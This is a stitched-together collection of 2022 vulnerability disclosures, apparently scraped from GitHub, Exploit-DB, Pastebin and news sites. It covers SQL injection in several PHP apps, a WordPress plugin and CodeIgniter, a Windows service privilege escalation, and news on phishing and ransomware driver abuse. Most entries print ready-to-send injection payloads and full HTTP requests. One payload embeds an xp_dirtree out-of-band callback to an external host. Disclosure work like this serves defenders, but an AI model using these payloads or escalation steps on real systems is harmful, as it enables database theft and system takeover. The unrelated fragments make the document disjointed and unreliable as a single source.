Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /diagnostic/edittest.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/edittest.php?id=

Vulnerability location: /diagnostic/edittest.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/edittest.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /diagnostic/edittest.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-41513: bug_report/SQLi-1.md at main · TGAyouman/bug_report

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php.

**Multiple functions of CodeIgniter have SQL injection****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

3.0rc <= CodeIgniter <= 3.1.13

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.39

**Vulnerability Details**

CodeIgniter is an Application Development Framework - a toolkit - for people who build web sites using PHP.

SQL injection exists for multiple functions in CodeIgniter, and the versions involved are 3.0rc to 3.1.13

The functions involved are where()、or\_where()、having()、or\_having()、where\_in()、or\_where\_in()、where\_not\_in()、or\_where\_not\_in()、like()、or\_like()、not\_like() and or\_not\_like().

The functions listed above do not filter the query fields. If the developer obtains the query fields from the client, the attacker can modify the query fields and trigger SQL injection.

**Describe**

    File:
        system\database\DB_query_builder.php
    
    Core Functions:
        protected function _wh($qb_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)    //662
        protected function _where_in($key = NULL, $values = NULL, $not = FALSE, $type = 'AND ', $escape = NULL)   //804
        protected function _like($field, $match = '', $type = 'AND ', $side = 'both', $not = '', $escape = NULL)    //947
    
    _wh() Explain
        //The following section provides the complete function code.
        ${$qb_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
        _wh() does not filter $k before splicing $prefix and $k. If we can control $k, SQL injection will be triggered.
        _where_in() and _like() have the same situation.
    
    Public Funtions
        Although  _wh()、where_in() and _like() are protected, but CodeIgniter provides some public functions.
        _wh()
            where()
            or_where()
            having()
            or_having()
        _where_in()        
            where_in()
            or_where_in()
            where_not_in()
            or_where_not_in()
        _like()        
            like()
            or_like()
            not_like()
            or_not_like()
    

protected function \_wh($qb\_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)
{
   $qb\_cache\_key = ($qb\_key === 'qb\_having') ? 'qb\_cache\_having' : 'qb\_cache\_where';
   if ( ! is\_array($key))
   {
   	$key = array($key => $value);
   }
   // If the escape value was not set will base it on the global setting
   is\_bool($escape) OR $escape = $this\->\_protect\_identifiers;
   foreach ($key as $k => $v)
   {
   	$prefix = (count($this\->$qb\_key) === 0 && count($this\->$qb\_cache\_key) === 0)
   		? $this\->\_group\_get\_type('')
   		: $this\->\_group\_get\_type($type);
   	if ($v !== NULL)
   	{
   		if ($escape === TRUE)
   		{
   			$v = $this\->escape($v);
   		}
   		if ( ! $this\->\_has\_operator($k))
   		{
   			$k .= ' = ';
   		}
   	}
   	elseif ( ! $this\->\_has\_operator($k))
   	{
   		// value appears not to have been set, assign the test to IS NULL
   		$k .= ' IS NULL';
   	}
   	elseif (preg\_match('/\\s\*(!?=|<>|\\sIS(?:\\s+NOT)?\\s)\\s\*$/i', $k, $match, PREG\_OFFSET\_CAPTURE))
   	{
   		$k = substr($k, 0, $match\[0\]\[1\]).($match\[1\]\[0\] === '=' ? ' IS NULL' : ' IS NOT NULL');
   	}
   	${$qb\_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
   	$this\->{$qb\_key}\[\] = ${$qb\_key};
   	if ($this\->qb\_caching === TRUE)
   	{
   		$this\->{$qb\_cache\_key}\[\] = ${$qb\_key};
   		$this\->qb\_cache\_exists\[\] = substr($qb\_key, 3);
   	}
   }
   return $this;
}

**Verification(3.1.13)**

    Code Download
        https://github.com/bcit-ci/CodeIgniter/releases/tag/3.1.13
    Apache needs to add the following in .htaccess
        <IfModule mod_rewrite.c>
        Options +FollowSymlinks -Multiviews
        RewriteEngine On
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteRule ^(.*)$ index.php?/$1 [QSA,PT,L]
        </IfModule>
    Environment Construction
        The detailed process is omitted, and the final result is as follows.
    

    File Modification
        1. Edit database configuration file application\config\database.php.
        As a test, I used the information schema of mysql system database 'information-schema'.
    

        2. Download the Sql.php file and move it to the application\controllers\ folder.
        Sql.php uses data table 'engines'.
    

    Try SQL Injection
        1. Normal access 
        Query with the field 'ENGINE'.
        Because the query conditions are different, the results are displayed differently.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE
    

        2.Malicious access
        SQL injection through fields.
        The 12 functions above all display the database name.
        SQL injection will occur when careless developers use fields sent by the front end.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE like '*' union select database(),2,3,4,5,6 -- -
    

  

**Verification(3.0rc)**

  

**Verification(3.1.1)**

CVE-2022-40835: CodeIgniter3.1.13-SQL-Inject/README.md at main · 726232111/CodeIgniter3.1.13-SQL-Inject

In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications."
Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the

In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications."

Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the address bar.

According to security researcher mr.d0x – who also devised the browser-in-the-browser (BitB) attack method earlier this year – a bad actor can leverage this behavior to resort to some HTML/CSS trickery and display a fake address bar on top of the window and fool users into giving up their credentials on rogue login forms.

"Although this technique is meant more towards internal phishing, you can technically still use it in an external phishing scenario," mr.d0x said. "You can deliver these fake applications independently as files."

This is achieved by setting up a phishing page with a fake address bar at the top, and configuring the \--app parameter to point to the phishing site hosting the page.

On top of that, the attacker-controlled phishing site can make use of JavaScript to take more actions, such as closing the window immediately after the user enters the credentials or resizing and positioning it to achieve the desired effect.

It's worth noting that the mechanism works on other operating systems, such as macOS and Linux, making it a potential cross-platform threat. However, the success of the attack is predicated on the fact that the attacker already has access to the target's machine.

That said, Google is phasing out support for Chrome apps in favor of Progressive Web Apps (PWAs) and web-standard technologies, and the feature is expected to be fully discontinued in Chrome 109 or later on Windows, macOS, and Linux.

The findings come as new findings Trustwave SpiderLabs show that HTML smuggling attacks are a common occurrence, with .HTML (11.39%) and .HTM (2.7%) files accounting for the second most spammed file attachment type after .JPG images (25.29%).

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Can Use 'App Mode' in Chromium Browsers' for Stealth Phishing Attacks

In yet another case of bring your own vulnerable driver (BYOVD) attack, the operators of the BlackByte ransomware are leveraging a flaw in a legitimate Windows driver to bypass security solutions.
"The evasion technique supports disabling a whopping list of over 1,000 drivers on which security products rely to provide protection," Sophos threat researcher Andreas Klopsch said in a new technical

In yet another case of bring your own vulnerable driver (BYOVD) attack, the operators of the BlackByte ransomware are leveraging a flaw in a legitimate Windows driver to bypass security solutions.

"The evasion technique supports disabling a whopping list of over 1,000 drivers on which security products rely to provide protection," Sophos threat researcher Andreas Klopsch said in a new technical write-up.

BYOVD is an attack technique that involves threat actors abusing vulnerabilities in legitimate, signed drivers to achieve successful kernel-mode exploitation and seize control of compromised machines.

Weaknesses in signed drivers have been increasingly co-opted by nation-state threat groups in recent years, including Slingshot, InvisiMole, APT28, and most recently, the Lazarus Group.

BlackByte, believed to be an offshoot of the now-discontinued Conti group, is part of the big game cybercrime crews, which zeroes in on large, high-profile targets as part of its ransomware-as-a-service (RaaS) scheme.

According to the cybersecurity firm, recent attacks mounted by the group have taken advantage of a privilege escalation and code execution flaw (CVE-2019-16098, CVSS score: 7.8) affecting the Micro-Star MSI Afterburner RTCore64.sys driver to disable security products.

What's more, an analysis of the ransomware sample has uncovered multiple similarities between the EDR bypass implementation and that of a C-based open source tool called EDRSandblast, which is designed to abuse vulnerable signed drivers to evade detection.

BlackByte is the latest ransomware family to embrace the BYOVD method to achieve its goals, after RobbinHood and AvosLocker, both of which have weaponized bugs in gdrv.sys (CVE-2018-19320) and asWarPot.sys to terminate processes associated with endpoint protection software.

To protect against BYOVD attacks, it's recommended to keep track of the drivers installed on the systems and ensure they are up-to-date, or opt to blocklist drivers known to be exploitable.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

BlackByte Ransomware Abuses Vulnerable Windows Driver to Disable Security Solutions

The default privileges for the running service Normand Remisol Advance Launcher in Beckman Coulter Remisol Advance v2.0.12.1 and prior allows non-privileged users to overwrite and manipulate executables and libraries. This allows attackers to access sensitive data.

Oct 1st, 2022 (edited)

21

0

Never

**Not a member of Pastebin yet?** **Sign Up**, it unlocks many cool features!

text 1.16 KB | Cybersecurity | 0 0

1.  CVE-2022-26236: Normand Remisol Advance Launcher
    

3.  A vulnerability was discovered in the Remisol Advance v2.0.12.1 and below for the Normand Remisol Advance Launcher. On installation, the permissions set by Remisol Advance allow non-privileged users to overwrite and/or manipulate executables and libraries that run as the elevated SYSTEM user on Windows.
    

5.  To recreate the conditions for exploitation, do the following;
    

7.  Step 1: Obtain low-level permission to a workstation (these workstations are usually protected with a weak password, a default vendor password, or no password).
    
8.  Step 2: Replace the message server service executable (LauncherService.exe or any associated library used with the service) with a malicious or PoC binary. Note: This service and its executable may be named something else in different regions; please check the services installed in Windows.
    
9.  Step 3: Restart the machine or service, whichever is more accessible.
    
10.  Step 4: Your binary will be started as the SYSTEM/NT Authority user.
    

12.  The fix is simple: correct the permissions so that every user cannot overwrite the services and make themselves a super admin on the local Windows host.

CVE-2022-26236: CVE-2022-26236: Normand Remisol Advance Launcher - Pastebin.com

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /leave_system/classes/Master.php?f=delete_department.

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Yuanbolin

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

First create a table in the database

CREATE TABLE \`department\_ist\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_department

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_department,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_department HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41355: Bug_report/SQLi-1.md at main · Cvedig/Bug_report

Simple Cold Storage Management System v1.0 is vulnerable to SQL injection via /csms/admin/inquiries/view_details.php?id=.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: fate@root

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/inquiries/view\_details.php?id=

Vulnerability location: /csms/admin/inquiries/view\_details.php?id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/inquiries/view\_details.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /csms/admin/inquiries/view\_details.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

CVE-2022-42250: bug_report/SQLi-1.md at main · fateroot/bug_report

Simple Cold Storage Management System v1.0 is vulnerable to SQL injection via /csms/admin/storages/view_storage.php?id=.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: fate@root

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/storages/view\_storage.php?id=

Vulnerability location: /csms/admin/storages/view\_storage.php?id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/storages/view\_storage.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /csms/admin/storages/view\_storage.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

CVE-2022-42249: bug_report/SQLi-2.md at main · fateroot/bug_report

Simple Cold Storage Management System v1.0 is vulnerable to SQL injection via /csms/admin/storages/manage_storage.php?id=.

**Simple Cold Storage Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: oner

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /csms/admin/storages/manage\_storage.php?id=

Vulnerability location: /csms/admin/storages/manage\_storage.php?id=, id

dbname =csms\_db,length=7

\[+\] Payload: /csms/admin/storages/manage\_storage.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /csms/admin/storages/manage\_storage.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0b
Connection: close

Tag

#windows